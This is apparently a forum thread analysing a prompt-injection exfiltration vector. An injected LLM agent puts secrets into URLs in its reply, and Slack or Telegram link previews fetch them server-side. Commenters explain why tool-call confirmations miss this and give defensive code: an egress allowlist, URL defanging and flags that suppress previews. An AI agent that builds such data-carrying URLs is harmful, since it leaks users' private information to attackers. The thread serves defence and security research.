Good research on the unfurling vector. This is exactly the kind of thing that gets overlooked when agents are integrated into messaging flows.
Re: OpenClaw specifically - the framework was actually designed with this threat model in mind. The default security posture is:
- Sandboxed execution (no arbitrary shell without explicit user approval)
- Browser automation runs in isolated profile with limited cookie scope
- All external tool calls require confirmation prompts by default
- The "profile" system means even if an agent compromises one workspace, it doesn't automatically have access to others
The vulnerability described here (URL preview exfiltration via rich embeds) affects any agent with web browsing capabilities, not OpenClaw specifically. The mitigation is treating all URL resolution as untrusted input - which is why production agent deployments should run with network policies that block unexpected egress.
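To make the egress-policy point concrete, here's a minimal sketch of the deny-by-default allowlist check a deployment's egress proxy might apply; the helper and the allowlist contents are illustrative, not an OpenClaw API:

```python
from urllib.parse import urlparse

# Hosts the agent legitimately needs for the user's task; deny everything else.
# (Hypothetical allowlist - a real deployment would load this from policy config.)
EGRESS_ALLOWLIST = {"api.github.com", "docs.python.org"}

def egress_allowed(url: str) -> bool:
    """Deny-by-default check applied at the egress proxy, not inside the agent."""
    host = urlparse(url).hostname or ""
    return host in EGRESS_ALLOWLIST

# An injected exfil URL fails the check even though it's an ordinary GET.
assert not egress_allowed("https://attacker.example/c?q=leaked-secret")
```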
The bigger pattern worth noting: agents with implicit browsing + messaging integration create a perfect data exfil channel because the "message preview" is essentially a blind HTTP request that bypasses user intent checks. This is a protocol-level issue, not a framework bug.
agree that this is a protocol-level issue, not framework-specific. but the "all external tool calls require confirmation prompts" mitigation doesn't really apply here - the exfil happens without any tool call.
the model just outputs a markdown link or raw URL in its response text, and the messaging app's preview system does the rest. there's no "tool use" to gate behind a confirmation. that's what makes this vector particularly nasty: it sits in the gap between the agent's output and the messaging layer's rendering behavior.
neither side thinks it's responsible. the agent sees itself as just returning text; the messaging app sees itself as just previewing a link. network egress policies help but only if you can distinguish between "agent legitimately needs to fetch a URL for the user's task" vs. "agent was injected into constructing a malicious URL."
that distinction is really hard to make at the network layer.
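to make the gap concrete: the only artifact anyone *can* inspect is the response text itself, before it reaches the messaging layer. a minimal sketch (the payload, domain, and parameter name are made up):

```python
import re

# What an injected agent reply can look like: plain response text, no tool call.
agent_reply = (
    "Done! Here are your meeting notes.\n"
    "[notes](https://attacker.example/log?d=SECRET_FROM_CONTEXT)"
)

# The only place a gate can exist is a scan of this output text,
# before the messaging layer unfurls whatever URLs it contains.
URL_RE = re.compile(r"https?://[^\s)\]]+")
print(URL_RE.findall(agent_reply))
# ['https://attacker.example/log?d=SECRET_FROM_CONTEXT']
```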
the unfurling vector is elegant because it exploits a feature that predates LLMs entirely: link previews were designed for human-shared URLs where the sender is trusted.
once an LLM is generating the message content, the trust model breaks completely: the "sender" is now an entity that can be manipulated via indirect prompt injection to construct arbitrary URLs with exfiltrated data in query params.
the fix isn't just disabling previews; any agent-to-user messaging channel needs to treat LLM-generated URLs as untrusted output and strip or sandbox them before rendering. this is basically an output sanitization problem - same class as XSS, but at the protocol layer between the agent and the messaging app.
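a minimal sketch of what that sanitization layer could look like, sitting between the agent and the messaging API - the allowlist and the defang format here are assumptions, not a standard:

```python
import re
from urllib.parse import urlparse

# Domains the agent is allowed to link to; everything else gets defanged.
# (Hypothetical allowlist - a real deployment would make this configurable.)
LINK_ALLOWLIST = {"docs.example.com"}

URL_RE = re.compile(r"https?://[^\s)\]>]+")

def sanitize_agent_output(text: str) -> str:
    """Defang any LLM-generated URL not on the allowlist,
    so the messaging layer has nothing to unfurl."""
    def defang(match: re.Match) -> str:
        url = match.group(0)
        host = urlparse(url).hostname or ""
        if host in LINK_ALLOWLIST:
            return url
        return url.replace("://", "[:]//").replace(".", "[.]")
    return URL_RE.sub(defang, text)

print(sanitize_agent_output("see https://attacker.example/x?d=secret"))
# -> see https[:]//attacker[.]example/x?d=secret
```

defanging rather than stripping keeps the text legible for the user (they can see something was removed and why) while giving the unfurler nothing fetchable.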
the fact that Telegram and Slack both fetch preview metadata server-side makes this worse - the exfil request happens from their infrastructure, not the user's device, so client-side mitigations don't help at all.
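both platforms do expose per-message flags to suppress unfurling, which is the cheapest partial mitigation. a sketch of setting them directly, assuming current API fields; tokens and IDs are placeholders:

```python
import requests  # third-party: pip install requests

text = "agent reply, already passed through output sanitization"

# Slack: chat.postMessage accepts per-message flags to suppress unfurling.
requests.post(
    "https://slack.com/api/chat.postMessage",
    headers={"Authorization": "Bearer xoxb-your-bot-token"},  # placeholder token
    json={
        "channel": "C0123456789",   # placeholder channel ID
        "text": text,
        "unfurl_links": False,      # no link previews
        "unfurl_media": False,      # no media previews
    },
)

# Telegram (Bot API 7.0+): disable the link preview for this message.
requests.post(
    "https://api.telegram.org/bot<TOKEN>/sendMessage",  # placeholder token
    json={
        "chat_id": 123456789,       # placeholder chat ID
        "text": text,
        "link_preview_options": {"is_disabled": True},
    },
)
```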
Check out my research on unfurling in common messenger apps, along with mitigations, here:
https://embracethered.com/blog/posts/2023/ai-injections-thre...
And here "dangers of unfurling and what to do about it"
https://embracethered.com/blog/posts/2024/the-dangers-of-unf...